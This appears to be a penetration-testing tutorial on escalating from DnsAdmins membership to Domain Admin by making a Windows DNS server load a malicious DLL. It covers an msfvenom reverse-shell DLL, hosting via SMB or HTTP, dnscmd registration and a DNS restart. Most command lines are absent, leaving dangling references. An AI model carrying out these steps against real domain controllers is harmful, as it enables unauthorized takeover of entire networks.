Users who are members of the group DnsAdmins have the ability to abuse a feature in the Microsoft DNS management protocol to make the DNS server load any specified DLL. The service which in turn, executes the DLL is performed in the context of SYSTEM and could be used on a Domain Controller (Where DNS is usually running from) to gain Domain Administrator privileges.
Once in an AD environment you can check for the user who is in the group DnsAdmin or Alias DnsAdmin with the commands:
If the output is as follows :
or
Then you can abuse this privilege!
Using metasploit "msfvenom" to create a malicious dll that will return a reverse shell with the command:
There are multiple ways for this stage, you can either host it in your SMBServer, Python HTTP server, or if you have shell in evil-winrm you can just upload the file.
Using the impacket scripts, impacket-smbserver you can run your server with a named share and test if you can reach it. Then from the target's host you can use net view to connect and grab the DLL.
you can then test if it's up with the command:
Replace 10.10.14.12 with your smb server IP. To test if the target is able to access your share you can run the command:
With python http.server module you can host the DLL file and download it in the target's machine using common utilities.
HOSTING
DOWNLOADING
Just run the command upload /path/to/pew.dll
We now inject the DLL in dnscmd executable using the command:
Now that the DLL is added successfully the next thing is to restart the dns server to trigger the DLL in returning a reverse shell.
This should trigger a reverse shell as administrator!
Alternatively if the reverse shell is too much, you can just create a DLL that will add the user you have access to the Domain Admins group. Below is the command to creaate the DLL:
I then upload it to the target's host! And attempt to execute it!